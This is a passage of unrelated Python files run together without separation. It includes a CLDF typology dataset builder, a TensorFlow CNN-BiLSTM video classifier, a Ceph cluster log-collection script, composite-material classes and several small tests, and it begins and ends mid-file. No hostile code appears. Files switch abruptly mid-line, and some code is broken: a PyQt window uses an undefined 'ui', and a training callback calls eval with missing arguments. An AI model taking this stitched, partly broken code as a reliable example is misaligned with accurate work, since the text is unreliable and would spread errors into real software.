print('{}:{}:misformatted IGT: "{}"'.format( p.name, d['ID'], ex.replace('\n', r'\n'))) #raise yield (ex, '', '', '', '') NA = ['?', '0?', '1?', '?1', '!!', '?CHECK, possibly 0', '?CHECK, possibly 1', '?CHECK'] class Dataset(BaseDataset): dir = pathlib.Path(__file__).parent id = "uratyp" def cldf_specs(self): # A dataset must declare all CLDF sets it creates. 
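        # A single CLDF StructureDataset is written to `cldf_dir`; its
        # language, parameter, code, value, example and contribution tables
        # are populated in cmd_makecldf below.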
return CLDFSpec(dir=self.cldf_dir, module="StructureDataset") def cmd_download(self, args): pass def cmd_makecldf(self, args): data = collections.defaultdict(dict) bibdata = database.parse_file(str(self.raw_dir.joinpath('sources.bib'))) refs = collections.defaultdict(list) for key, entry in bibdata.entries.items(): src = Source.from_entry(key, entry) for k in src: src[k] = unescape(src[k]) for lid in src.get('langref', '').split(','): lid = lid.strip() refs[lid].append(src.id) args.writer.cldf.sources.add(src) examples = collections.defaultdict(list) for p in self.raw_dir.joinpath('UT', 'language-tables').glob('*.csv'): #if p.stem not in ['Finnish', 'Kazym_Khanty', 'Komi_Zyrian', 'Lule_Saami']: # continue for row in reader(p, dicts=True): # # FIXME: check examples right here! # data[p.stem][row['ID']] = row for ex in check_example(p, row): examples[p.stem, row['ID']].append(ex) args.writer.cldf.add_component( 'LanguageTable', { 'name': 'Source', 'separator': ';', "propertyUrl": "http://cldf.clld.org/v1.0/terms.rdf#source", }) args.writer.cldf.add_component('CodeTable') args.writer.cldf.add_component( 'ExampleTable', { 'name': 'Analyzed_Word_IPA', 'separator': '\t', } ) t = args.writer.cldf.add_component('ContributionTable') t.common_props['dc:description'] = \ "UraTyp combines typological data collected with two separate questionnaires. " \ "These questionnaires are listed in the ContributionTable, and parameters, " \ "i.e. features (and thus values) are linked to this table according to their origin." args.writer.cldf.add_component( 'ParameterTable', 'Area', { "name": "Contribution_ID", "propertyUrl": "http://cldf.clld.org/v1.0/terms.rdf#contributionReference", "dc:description": "Links a feature to the questionnaire it comes from.", }, ) args.writer.cldf['LanguageTable', 'Glottocode'].null = ['?'] args.writer.cldf['LanguageTable', 'ISO639P3code'].null = ['?'] # args.writer.cldf['LanguageTable', 'Macroarea'].null = ['Eurasia'] args.writer.cldf.add_columns('LanguageTable', 'Subfamily') args.writer.cldf.add_columns( 'ValueTable', {'name': 'Example_ID', 'propertyUrl': 'http://cldf.clld.org/v1.0/terms.rdf#exampleReference'}) lmap = {} for lang in self.raw_dir.read_csv('Languages.csv', dicts=True): lang['ISO639P3code'] = lang.pop('ISO.639.3') lang['Source'] = refs.get(lang['Name'], []) del lang['citations'] args.writer.objects['LanguageTable'].append(lang) lmap[lang['Name']] = lang['ID'] lmap[lang['Glottocode']] = lang['ID'] gb_features = { r['Feature_ID']: list(gb_codes(r['Possible Values'])) for r in self.raw_dir.read_csv('gb.csv', dicts=True)} eid = 0 for sd, contrib in [('UT', 'Uralic Areal Typology'), ('GB', 'Grambank')]: args.writer.objects['ContributionTable'].append( dict(ID=sd, Name=contrib)) for param in read(self.raw_dir / sd / 'Features.csv'): param['Contribution_ID'] = sd args.writer.objects['ParameterTable'].append(param) if sd == 'UT': codes = [('1', 'yes'), ('0', 'no')] else: codes = gb_features[param['ID']] for code, name in codes: args.writer.objects['CodeTable'].append(dict( ID='{}-{}'.format(param['ID'], code), Name=code, Description=name, Parameter_ID=param['ID'], )) for row in read(self.raw_dir / sd / 'Finaldata.csv'): for k in row: if k in ['language', 'subfam']: continue # if ('?' in row[k]) or ('!!' 
in row[k]): # continue d = {} lid = lmap[row['language']] if k.startswith('UT'): d = data[row['language']][k] if row[k] in ['', 'N/A']: # don't even include the rows continue assert list(d.values())[2] == row[k] #assert row[k] != '1' or d['Example'], str(d) for ex in examples[row['language'], k]: pt, analyzed, gloss, translation, comment = ex if (not pt) and analyzed: pt = ''.join(analyzed) if isinstance(analyzed, list) else analyzed if not pt: print(ex) continue eid += 1 args.writer.objects['ExampleTable'].append(dict( ID=str(eid), Language_ID=lid, Primary_Text=pt, Analyzed_Word=analyzed if isinstance(analyzed, list) else [analyzed], Gloss=[gloss] if isinstance(gloss, str) else gloss, Translated_Text=translation.strip(), )) args.writer.objects['ValueTable'].append(dict( ID='{}-{}'.format(lid, k), Language_ID=lid, Parameter_ID=k, Value='?' if row[k] in NA else str(int(float(row[k]))), Code_ID=None if row[k] in NA else '{}-{}'.format( k, int(float(row[k]))), Comment=d.get('Comment'), Example_ID=str(eid) if d.get('Example') else None, )) tests/test_trace_segment_client.py # -*- coding:utf-8 -*- # author:huawei import time from python2sky import config from python2sky.context.context_carrier import ContextCarrier from python2sky.context.context_manager import ContextManager from python2sky.remote.service_register_client import get_service_register from python2sky.remote.trace_segment_client import get_trace_segment_client from python2sky.util.uuid_util import global_id_to_string from tests.base_test_case import BaseTestCase class Trace_segment_client(BaseTestCase): def test_send(self): # get_service_register() # time.sleep(10) get_trace_segment_client() # time.sleep(0) # carrier = ContextCarrier() # carrier.deserialize(self.SW6) config.SERVICE_ID = 3 config.SERVICE_INSTANCE_ID = 53 entry_span = ContextManager.create_entry_span("/operation", None) # local_span = ContextManager.create_local_span("/local") # carrier2 = ContextCarrier() # exit_span = ContextManager.create_inject_exit_span("/exit", "192.168.3.11:8080", carrier2) # sw6 = carrier.serialize() # self.assertEqual(sw6, carrier.serialize()) # self.assertEqual(ContextManager.get_global_trace_id(), global_id_to_string(["3", "4", "5"])) # ContextManager.stop_span(exit_span) # ContextManager.stop_span(local_span) ContextManager.stop_span(entry_span) a276me/irisUI/app.py import sys from PyQt5.QtWidgets import QApplication, QMainWindow class MainWin(QMainWindow): def __init__(self): super(MainWin, self).__init__() self.ui = ui.Ui_MainWindow() self.ui.setupUi(self) app = QApplication(sys.argv) #设图标 mainWin = MainWin() #ui = untitled.Ui_MainWindow() #ui.setupUi(mainWin) mainWin.show() sys.exit(app.exec_())from __future__ import print_function import numpy as np import os import tensorflow as tf from tensorflow.contrib import rnn import tensorflow.contrib as tf_contrib import json import pprint import utils import base_model def variable_summaries(var): """Attach a lot of summaries to a Tensor (for TensorBoard visualization).""" with tf.name_scope('summaries'): mean = tf.reduce_mean(var) tf.summary.scalar('mean', mean) with tf.name_scope('stddev'): stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean))) tf.summary.scalar('stddev', stddev) tf.summary.scalar('max', tf.reduce_max(var)) tf.summary.scalar('min', tf.reduce_min(var)) tf.summary.histogram('histogram', var) def neurons_histogram(var, name): tf.summary.histogram(name=name, values=var) def neurons_scalar(var, name): tf.summary.scalar(name=name, tensor=var) tf.summary.histogram(name=name, 
values=var) def get_activation(inputs, act, name=None, **kwargs): if act == 'relu': return tf.nn.relu(inputs, name=name) elif act == 'tanh': return tf.nn.tanh(inputs, name=name) elif act == 'softmax': return tf.nn.softmax(inputs, name=name) else: return inputs def conv_layer(training, inputs, input_shape, filters, kernel_size, conv_num=1, use_bias=False, activation='relu', pooling=None, batch_norm=True, padding='valid', dropout=0.0, stride=1, name=None): assert len(input_shape) == 4 def compute_output_length(input_length, filter_size, padding, stride, dilation=1): if input_length is None: return None assert padding in {'same', 'valid', 'full', 'causal'} dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1) if padding == 'same': output_length = input_length elif padding == 'valid': output_length = input_length - dilated_filter_size + 1 elif padding == 'causal': output_length = input_length elif padding == 'full': output_length = input_length + dilated_filter_size - 1 return (output_length + stride - 1) // stride feed_input = inputs shape = list(input_shape) for i in range(conv_num): feed_input = tf.layers.conv2d(feed_input, filters=filters, kernel_size=[kernel_size] * 2, strides=[stride] * 2, padding=padding, use_bias=use_bias, data_format='channels_last', kernel_initializer=tf.contrib.layers.xavier_initializer(), name='{}_conv_{}'.format(name, i) ) if batch_norm: # conv = BatchNormalization()(conv) # model.add(BatchNormalization()) feed_input = tf.layers.batch_normalization(feed_input, training=training, name='{}_bn_{}'.format(name, i)) feed_input = get_activation(feed_input, activation, name='{}_act_{}'.format(name, i)) neurons_histogram(feed_input, '{}_convbnact_{}'.format(name, i)) shape[1:-1] = [compute_output_length(input_length=shape[1], filter_size=kernel_size, padding=padding, stride=stride, )] * 2 shape[-1] = filters return feed_input, shape def dense_layer(training, inputs, input_shape, units, activation=None, use_bias=True, kernel_initializer=tf_contrib.layers.xavier_initializer(), trainable=True, name=None, batch_norm=True, reuse=None, ): print('Dense layer: {}'.format(units)) inputs = tf.layers.dense(inputs, units=units, use_bias=use_bias, trainable=trainable, kernel_initializer=kernel_initializer, reuse=reuse, name='{}_dense'.format(name)) if batch_norm: inputs = tf.layers.batch_normalization(inputs, training=training, name='{}_bn'.format(name)) inputs = get_activation(inputs, activation, name='{}_act'.format(name)) neurons_histogram(inputs, '{}_densebnact'.format(name)) assert input_shape and len(input_shape) >= 2 assert input_shape[-1] output_shape = list(input_shape) output_shape[-1] = units return inputs, output_shape def cnn_block(training, inputs, input_shape, activation='relu', pooling=None, use_bias=False, batch_norm=True, padding='valid', print_fn=print, ): conv_configs = [ {'filters': 16, 'conv_num': 2, 'kernel_size': 4, 'stride': 1}, {'filters': 16, 'conv_num': 2, 'kernel_size': 4, 'stride': 2}, {'filters': 16, 'conv_num': 2, 'kernel_size': 4, 'stride': 1}, ] dense_units = 32 for i, config in enumerate(conv_configs): inputs, input_shape = conv_layer(training=training, inputs=inputs, input_shape=input_shape, filters=config['filters'], conv_num=config['conv_num'], kernel_size=config['kernel_size'], stride=config['stride'], use_bias=use_bias, padding=config.get('padding', padding), pooling=pooling, batch_norm=batch_norm, activation=activation, name='conv_{}'.format(i) ) print('conv {}, {}, {}'.format(i, config, input_shape)) # flatten input_shape = 
[input_shape[0], np.prod(input_shape[1:])] print('_flatten {}'.format(input_shape)) inputs = tf.reshape(inputs, input_shape) # dense inputs, input_shape = dense_layer(training, inputs, input_shape, dense_units, 'relu', use_bias, batch_norm=batch_norm, name='conv_fc') return inputs, input_shape def time_distributed(training, inputs, input_shape, applier, applier_config): shape = list(input_shape) time_length = shape[1] inside_shape = list([-1, ] + shape[2:]) print('inside_shape {}'.format(inside_shape)) inputs = tf.reshape(inputs, inside_shape) inputs, output_shape = applier(training=training, inputs=inputs, input_shape=inside_shape, **applier_config) inputs = tf.reshape(inputs, [-1, time_length] + output_shape[1:]) output_shape = [-1, time_length] + output_shape[1:] return inputs, output_shape def bi_lstm(training, inputs, input_shape, num_hidden, forget_bias=1.0, activation='tanh', print_fn=print, ): timesteps = input_shape[1] inputs = tf.unstack(inputs, timesteps, 1) with tf.variable_scope('forward_pass'): fw_cell = rnn.LSTMCell(num_hidden, # activation=activation, forget_bias=forget_bias, initializer=tf_contrib.layers.xavier_initializer(), ) with tf.variable_scope('backward_pass'): bw_cell = rnn.LSTMCell(num_hidden, # activation=activation, forget_bias=forget_bias, initializer=tf_contrib.layers.xavier_initializer() ) # Get lstm cell output with tf.variable_scope('birnn') as bi_scope: # try: inputs, _, _ = rnn.static_bidirectional_rnn(fw_cell, bw_cell, inputs, scope=bi_scope, dtype=tf.float32) print('here success') # except Exception: # Old TensorFlow version only returns outputs not states # inputs = rnn.static_bidirectional_rnn(fw_cell, bw_cell, inputs,scope=bi_scope, # dtype=tf.float32) shape = [-1, 2 * num_hidden] neurons_histogram(inputs[-1], 'birnn_final') # inputs, shape = dense_layer(training, inputs, shape) return inputs[-1], shape def cnn_rnn_sequential(**kwargs): input_shape = [None, 15, 64, 64, 3] inputs = tf.placeholder(tf.float32, shape=input_shape, name='inputs') training = tf.placeholder_with_default(False, shape=(), name='training') learning_rate = tf.placeholder_with_default(kwargs.get('learning_rate', 0.001), shape=(), name='learning_rate') labels = tf.placeholder(tf.float32, shape=[None, 6], name='labels') num_hidden = 32 shape = list([-1] + input_shape[1:]) feed_input = inputs feed_input = tf.divide(tf.subtract(feed_input, 175.5), 175.5) feed_input, shape = time_distributed(training=training, inputs=feed_input, input_shape=shape, applier=cnn_block, applier_config={ }) feed_input, shape = bi_lstm(training, feed_input, shape, num_hidden=num_hidden, ) # output print('{} -- {}'.format(feed_input, shape)) feed_input, shape = dense_layer(training=training, inputs=feed_input, input_shape=shape, units=6, batch_norm=False, name='fc_out') outputs = get_activation(feed_input, 'softmax', name='outputs') # neurons_scalar(outputs, 'outputs_scalar') predictions = tf.argmax(outputs, axis=1, name='predictions') correct_predictions = tf.equal(predictions, tf.argmax(labels, 1)) accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32), name='accuracy') neurons_scalar(accuracy, 'accuracy_scalar') softmax_logits = tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=feed_input) loss = tf.reduce_mean(softmax_logits) neurons_scalar(loss, 'loss_scalar') optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): train_op = optimizer.minimize(loss) summaries = 
tf.summary.merge_all() # train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train', # sess.graph) # test_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/test') return { 'inputs': inputs, 'training': training, 'labels': labels, 'outputs': outputs, 'learning_rate': learning_rate, 'predictions': predictions, 'accuracy': accuracy, 'loss': loss, 'optimizer': optimizer, 'train_op': train_op, 'summaries': summaries } class CNN_RNN_Sequential_raw(base_model.ClassiferTfModel): def __init__(self, config_file=None, job_dir=None, checkpoint_path=None, print_f=print, sequence_length=15, input_dim=64, label_set=None, batch_norm=False, **kwargs): super().__init__(config_file, job_dir, checkpoint_path, print_f, sequence_length, input_dim, label_set, batch_norm) self.model_ops = None self.session = None self.tfboard_train_writer = None self.tfboard_test_writer = None self.learning_rate = kwargs.get('learning_rate', 0.001) self.learning_rate_decay = kwargs.get('learning_rate_decay', 0.5) self.learning_rate_tolerance = kwargs.get('learning_rate_tolerance', 5) self.eval_loss_max = 10000 self.eval_loss_max_count = self.learning_rate_tolerance self.early_stopping = kwargs.get('early_stopping', 20) def load_model_from_savedmodel(self, export_path): self.compile() self.initialize(init_weights=False, init_tfboard=False) utils.session_from_savedmodel(session=self.session, export_dir=export_path) def load_config(self): if self.config_file is not None: self.config = json.load(open(self.config_file, 'r')) pprint.pprint(self.config) if self.config is not None and "cnn_block" in self.config: self.batch_norm = self.config['cnn_block'].get('batch_norm', True) else: self.batch_norm = True def init_tensorboard(self): assert self.model_ops is not None assert self.session is not None self.tfboard_train_writer = tf.summary.FileWriter(os.path.join(self.job_dir, 'train'), self.session.graph) self.tfboard_test_writer = tf.summary.FileWriter(os.path.join(self.job_dir, 'test'), self.session.graph) def initialize(self, init_weights=True, init_tfboard=True): assert self.model_ops is not None self.session = tf.Session() if init_weights: self.session.run(tf.global_variables_initializer()) if init_tfboard: self.init_tensorboard() def end_train(self): if self.session is not None: self.session.close() self.session = None def compile(self, **kwargs): super().compile(**kwargs) self.load_config() self.model_ops = cnn_rnn_sequential() def _run_session_pred(self, requireds, feed_dict, batch_size=32): # assert isinstance(requireds, (list, tuple)) assert self.model_ops is not None assert self.session is not None return self.session.run(requireds, feed_dict=feed_dict) def _predict_batch(self, data): return self._run_session_pred(requireds=self.model_ops['outputs'], feed_dict={ self.model_ops['inputs']: data, self.model_ops['training']: False }) def predict(self, data, batch_size=32): # super().predict(data) assert self.model_ops is not None assert self.session is not None if len(data) <= batch_size: return self._predict_batch(data) steps = len(data) // batch_size - 1 results = [] for i in range(steps): d = self._predict_batch(data[i * batch_size:(i + 1) * batch_size]) results.append(d) d = self._predict_batch(data[steps * batch_size:]) results.append(d) results = np.concatenate(results) print(results.shape) return results def _eval_batch(self, required, data, labels): return self._run_session_pred(requireds=required, feed_dict={ self.model_ops['inputs']: data, self.model_ops['labels']: labels, self.model_ops['training']: False }) 
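    # eval() below runs the network over the validation data in mini-batches:
    # it returns the concatenated softmax outputs plus the mean of the
    # per-batch [accuracy, loss] metrics (the final partial batch contributes
    # predictions but is left out of the metric average).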
def eval(self, data, labels, batch_size=64, required=None): assert self.model_ops is not None assert self.session is not None if required is None: required = (self.model_ops['outputs'], [self.model_ops['accuracy'], self.model_ops['loss']]) if len(data) <= batch_size: return self._eval_batch(required, data, labels) steps = len(data) // batch_size - 1 preds = [] metrics = [] for i in range(steps): p, m = self._eval_batch(required, data[i * batch_size:(i + 1) * batch_size], labels[i * batch_size:(i + 1) * batch_size],) preds.append(p) metrics.append(np.array(m)) p, m = self._eval_batch(required, data[steps * batch_size:], labels[steps * batch_size:] ) preds.append(p) # metrics.append(m) preds = np.concatenate(preds) print(preds.shape) metrics = np.mean(np.array(metrics), axis=0) print(metrics.shape) return preds, metrics def test_on_trained(self, test_files): if test_files is not None: self.print_f('-- Perform Testing --') if isinstance(test_files, (list, tuple)): test_files = test_files[0] X, y = utils.load_npz(test_files) print('Test Shape x: {}'.format(self.X.shape)) print('Test Shape y: {}'.format(self.y.shape)) assert self.session is not None pred_val = np.argmax(self.predict(X), axis=1) true_val = np.argmax(y, axis=1) utils.report(true_val, pred_val, self.label_set, print_fn=self.print_f) self.print_f('Save model to {}'.format(self.job_dir)) # utils.to_savedmsesodel(self.model, os.path.join(self.job_dir, 'export')) utils.session_to_savedmodel(self.session, self.model_ops['inputs'], self.model_ops['outputs'], os.path.join(self.job_dir, 'export')) def on_epoch_end(self, epoch, **kwargs): assert self.session is not None if epoch > 0 and (epoch % kwargs.get('eval_freq', 4) == 0 or epoch == kwargs.get('epochs', 15)): # preds, loss, summaries = self.eval(self.X_val) pred_val = np.argmax(preds, axis=1) if self.true_val is None: self.true_val = np.array(np.argmax(self.y_val, axis=1)) utils.report(self.true_val, pred_val, self.label_set, print_fn=self.print_f) self.tfboard_test_writer.add_summary(summaries, epoch) def mid_eval(self, epoch, step, **kwargs): assert self.session is not None self.print_f('--- Start eval ---') sum_step = kwargs['steps'] * epoch + step self.tfboard_train_writer.add_summary(kwargs['train_summaries'], sum_step) # if epoch > 0 and (epoch % kwargs.get('eval_freq', 4) == 0 or epoch == kwargs.get('epochs', 15)): assert self.session is not None sum_step = kwargs['steps'] * epoch + step self.tfboard_train_writer.add_summary(kwargs['train_summaries'], sum_step) # if epoch > 0 and (epoch % kwargs.get('eval_freq', 4) == 0 or epoch == kwargs.get('epochs', 15)): # self.test_size = 500 # if len(self.X_val) < self.test_size: # self.test_size = len(self.X_val) # # self.test_idx = np.arange(0, self.test_size) # np.random.shuffle(self.test_idx) data = self.X_val # data = self.X_val[self.test_idx] # labels = self.y_val[self.test_idx] labels = self.y_val preds, metrics = self.eval(data, labels) print(metrics) loss = metrics[1] acc = metrics[0] summaries = tf.Summary() summaries.value.add(tag="accuracy_scalar", simple_value=acc) summaries.value.add(tag="loss_scalar", simple_value=loss) pred_val = np.argmax(preds, axis=1) self.true_val = np.argmax(labels, axis=1) # if self.true_val is None: utils.report(self.true_val, pred_val, self.label_set, epoch=sum_step, print_fn=self.print_f, loss=loss) self.tfboard_test_writer.add_summary(summaries, sum_step) # change learning rate if loss <= self.eval_loss_max: self.eval_loss_max = loss self.eval_loss_max_count = self.learning_rate_tolerance else: 
self.eval_loss_max_count -= 1 if self.eval_loss_max_count == 0: self.eval_loss_max_count = self.learning_rate_tolerance self.learning_rate *= self.learning_rate_decay self.print_f('### update learning rate to {}'.format(self.learning_rate)) self.print_f('--- Finish eval ----') def fit(self, train_files, test_files=None, batch_size=32, epochs=10, validation_split=0.1, callbacks=None, **kwargs): # super().fit(train_files, test_files, batch_size, epochs, validation_split, callbacks, **kwargs) eval_per_epoch = 30 self.process_training_data(train_files, split=validation_split) self.initialize() train_idx = np.arange(0, len(self.y)) steps = len(self.y) // batch_size - 1 assert self.session is not None for e in range(epochs): self.print_f('Epoch {}'.format(e)) np.random.shuffle(train_idx) for s in range(steps): inputs = self.X[train_idx[s * batch_size: (s + 1) * batch_size]] labels = self.y[train_idx[s * batch_size: (s + 1) * batch_size]] _, loss, acc, summaries = self.session.run( [self.model_ops['train_op'], self.model_ops['loss'], self.model_ops['accuracy'], self.model_ops['summaries']], feed_dict={ self.model_ops['inputs']: inputs, self.model_ops['labels']: labels, self.model_ops['training']: True, self.model_ops['learning_rate']: self.learning_rate }) if s % eval_per_epoch == 0: self.print_f('--E({}) -- step ({}) -- loss ({}) -- acc ({})'.format(e, s, loss, acc)) # self.tfboard_train_writer.add_summary(summaries, steps * e + s) self.mid_eval(e, s, steps=steps, train_loss=loss, train_acc=acc, train_summaries=summaries) # self.on_epoch_end(e, eval_freq=kwargs.get('eval_freq', 4), epochs=epochs) self.test_on_trained(test_files=test_files) self.end_train() if __name__ == '__main__': model_ops = cnn_rnn_sequential() with tf.Session() as sess: sess.run(tf.global_variables_initializer()) size = 5 d = np.random.randint(0, 255, size=[size, 15, 64, 64, 3]) eye = np.eye(6) l = np.array([eye[i] for i in [np.random.randint(0, 6) for j in range(size)]]) print('{} {}'.format(d.shape, l.shape)) _, loss, acc = sess.run((model_ops['train_op'], model_ops['loss'], model_ops['accuracy']), feed_dict={ model_ops['inputs']: d, model_ops['labels']: l, model_ops['training']: True }) print('Loss: {}, acc: {}'.format(loss, acc)) import unittest import numpy as np from numpy.testing import assert_array_almost_equal from .test_base import BaseSparrayTest, dense2d class TestTrueDivision(BaseSparrayTest): def test_truediv(self): c = 3 assert_array_almost_equal(dense2d / c, (self.sp2d / c).toarray()) with np.errstate(divide='ignore'): assert_array_almost_equal(c / dense2d, c / self.sp2d) def test_itruediv(self): self.sp2d /= 1 assert_array_almost_equal(dense2d, self.sp2d.toarray()) b = np.random.random(dense2d.shape) self.sp2d /= b assert_array_almost_equal(dense2d / b, self.sp2d.toarray()) if __name__ == '__main__': unittest.main() # coding:utf-8 from __future__ import print_function import numpy as np import scipy as sp import math class Fibre(object): """docstring for Fibre""" def __init__(self, Ef1 = 0, Ef2 = 0,Gf12 = 0, vf21 = 0 , vf12 =0 ,density = 0 ,unit = 1, \ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Fibre_'): super(Fibre, self).__init__() self.unit = unit self.Ef1 = Ef1 * unit self.Ef2 = Ef2 * unit self.Gf12 = Gf12 * unit self.vf21 = vf21 if self.Ef1 != 0: self.vf12 = self.vf21 * self.Ef2 / self.Ef1 self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S self.density = density self.name = name def change_Fibre(self, Ef1, Ef2 ,Gf12 ,vf21 ,unit,density,\ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 
'Fibre_'): self.Ef1 = Ef1 * unit self.Ef2 = Ef2 * unit self.Gf12 = Gf12 * unit self.vf21 = vf21 self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S self.density = density self.name = name class Matrix(object): """docstring for Matrix""" def __init__(self, Em = 0 , Gm = 0, vm = 0 , density = 0,unit =1,\ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Matrix_'): super(Matrix, self).__init__() self.Em = Em * unit self.Gm = Gm * unit self.vm = vm self.density = density self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S def change_Matrix(self, Em ,Gm,vm,unit , density,\ Xt = 0, Xc = 0,Yt = 0, Yc = 0, S = 0,name = 'Matrix_'): self.Em = Em * unit self.Gm = Gm * unit self.vm = vm self.Xt = Xt self.Xc = Xc self.Yt = Yt self.Yc = Yc self.S = S self.density = density self.name = namejulpark-rh/cephci0 """Standard script to collect all the logs from ceph cluster through installer node Through installer node get all other nodes in the cluster, generate sosreport for all the nodes obtained. Run shell script on installer node, then upload all the collected logs to magna Typical usage example: python collect_logs.py --ip x.x.x.x --username abc --password python collect_logs.py -h """ import json import os import re import sys from docopt import docopt from ceph.ceph import SSHConnectionManager from ceph.parallel import parallel from utility.utils import generate_unique_id doc = """ Standard script to collect all the logs from ceph cluster through installer node Usage: collect_logs.py --ip --username --password [--directory ] collect_logs.py (-h | --help) Options: -h --help Shows the command usage --ip IP address of Installer node. --username Username to be used to access the system other than root --password password of given username --directory directory/folder name """ def upload_logs( log_dir: str, ssh_install, nodeip: str, results: list, directory: str ) -> None: """Uploading all the collected logs to magna from installer node Args: log_dir directory to store all the logs ssh_install ssh object of installer node nodeip host Ip address od installer node results host Ip address which are failed Returns: None """ try: file_share = "http://magna002.ceph.redhat.com/cephci-jenkins" print("uploading logs to Magna") ssh_install.exec_command("sudo mkdir -p tmp") cmd = "sudo mount -t nfs -o sec=sys,nfsvers=4.1 reesi004.ceph.redhat.com:/ tmp" ssh_install.exec_command(cmd) stdin, stdout, stderr = ssh_install.exec_command( f"[ -d tmp/cephci-jenkins/{directory} ]; echo $?" 
) if not directory or json.loads(stdout): print("Either directory is not provided or given diretory does not exist") ssh_install.exec_command("mkdir -p tmp/cephci-jenkins/ceph_logs") ssh_install.exec_command(f"mv {log_dir} tmp/cephci-jenkins/ceph_logs/") print( f"Logs Successfully uploaded to Magna, location:{file_share}/ceph_logs/{log_dir}" ) else: print(f"Given directory {directory} exist") ssh_install.exec_command(f"mv {log_dir} ceph_logs") ssh_install.exec_command(f"mv ceph_logs tmp/cephci-jenkins/{directory}/") print( f"Logs Successfully uploaded to Magna, location:{file_share}/{directory}/ceph_logs" ) except Exception: results.append(nodeip) def collect_logs( nodeip: str, ssh_install, uname: str, log_dir: str, results: list ) -> None: """Collect log from installer node based on ceph version Args: nodeip host Ip address od installer node ssh_install ssh object of installer node uname Username of installer node log_dir directory to store all the logs results host Ip address which are failed Returns: None """ try: stdin, stdout, stderr = ssh_install.exec_command("sudo ceph --version") if not stderr: file_name = "cephansible.sh" else: file_name = "cephadm.sh" file = os.path.join(os.path.dirname(__file__), f"{file_name}") sftp = ssh_install.open_sftp() sftp.put(f"{file}", f"/home/{uname}/{file}") ssh_install.exec_command( f"sudo sh {file} > ceph_status.txt; tar -cf ceph_status.tar.gz ceph_status.txt" ) ssh_install.exec_command( f"chmod 755 ceph_status.tar.gz; sudo mv ceph_status.tar.gz {log_dir}/" ) print("Command output successfully stored") except Exception: results.append(nodeip) def generate_sosreport_in_node( ssh_install, nodeip: str, uname: str, pword: str, log_dir: str, results: list ) -> None: """Generate sosreport in the given node and copy report to installer Args: ssh_install ssh object of installer node nodeip host Ip address uname Username for accessing host pword password for accessing host through given user log_dir directory to store all the logs results host Ip address which are failed Returns: None """ print(f"Connecting {nodeip} to generate sosreport") try: ssh_d = SSHConnectionManager(nodeip, uname, pword).get_client() ssh_d.exec_command("sudo yum -y install sos") stdin, stdout, stderr = ssh_d.exec_command( "sudo sosreport -a --all-logs -e ceph --batch" ) sosreport = re.search(r"/var/tmp/sosreport-.*.tar.xz", stdout) print(f"Successfully generated sosreport in node {nodeip} :{sosreport.group()}") ssh_d.exec_command(f"sudo chmod 755 {sosreport.group()}") ssh_install.exec_command(f"scp {nodeip}:{sosreport.group()} {log_dir}") ssh_d.exec_command(f"sudo rm -rf {sosreport.group()}") ssh_d.close() print(f"Successfully moved report from {nodeip} to installer") except Exception: results.append(nodeip) def run(args: dict) -> int: """Standard script to collect all the logs from ceph cluster through installer node Through installer node get all other nodes in the cluster, generate sosreport for all the nodes obtained. 
Run shell script on installer node, then upload all the collected logs to magna Args: ip installer IP address username username to be used to access the system other than root password password for installer node Returns: 0 on success or 1 for failures Raises: AssertionError: An error occurred if given IP is not of Installer node """ results = [] run_id = generate_unique_id(length=6) ip = args["--ip"] uname = args["--username"] pword = args["--password"] directory = args["--directory"] log_dir = f"ceph_logs_{run_id}" ssh_install = SSHConnectionManager(ip, uname, pword).get_client() stdin, stdout, stderr = ssh_install.exec_command("hostname") if "installer" not in stdout: raise AssertionError("Please provide installer node details") ssh_install.exec_command(f"sudo mkdir -p {log_dir}") ssh_install.exec_command(f"sudo chown -R {uname}:{uname} {log_dir}") stdin, stdout, stderr = ssh_install.exec_command( "cut -f 1 /etc/hosts | cut -d ' ' -f 3" ) nodes = stdout.splitlines() print(f"Host that are obtained from given host: {nodes}") collect_logs(ip, ssh_install, uname, log_dir, results) with parallel() as p: for nodeip in nodes: if nodeip: p.spawn( generate_sosreport_in_node, ssh_install, nodeip, uname, pword, log_dir, results, ) upload_logs(log_dir, ssh_install, ip, results, directory) print(f"Failed to collect logs from nodes :{results}") return 1 if results else 0 if __name__ == "__main__": arguments = docopt(doc) rc = run(arguments) sys.exit(rc) 0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sat Jun 12 21:46:25 2021 @author: surajitrana """ """ Draw a line in a diagram from position (1, 3) to (2, 8) then to (6, 1) and finally to position (8, 10): """ import matplotlib.pyplot as plt import numpy as np def plot_graph(): x_points = np.array([1, 2, 6, 8]) y_points = np.array([3, 8, 1, 10]) plt.plot(x_points, y_points) plt.show() if __name__ == "__main__": plot_graph() vandofb/robotframework-fork try: from enum import Enum except ImportError: # Python < 3.4, unless installed separately Enum = object from datetime import datetime, date, timedelta from decimal import Decimal from robot.utils import unicode class MyEnum(Enum): FOO = 1 bar = 'xxx' class Unknown(object): pass def integer(argument=1, expected=None): _validate_type(argument, expected) def float_(argument=-1.0, expected=None): _validate_type(argument, expected) def decimal(argument=Decimal('1.2'), expected=None): _validate_type(argument, expected) def boolean(argument=True, expected=None): _validate_type(argument, expected) def string(argument='', expected=None): _validate_type(argument, expected) def unicode_(argument=u'', expected=None): _validate_type(argument, expected) def bytes_(argument=b'', expected=None): _validate_type(argument, expected) def bytearray_(argument=bytearray(), expected=None): _validate_type(argument, expected) def datetime_(argument=datetime.now(), expected=None): _validate_type(argument, expected) def date_(argument=date.today(), expected=None): _validate_type(argument, expected) def timedelta_(argument=timedelta(), expected=None): _validate_type(argument, expected) def enum(argument=MyEnum.FOO, expected=None): _validate_type(argument, expected) def none(argument=None, expected=None): _validate_type(argument, expected) def list_(argument=['mutable', 'defaults', 'are', 'bad'], expected=None): 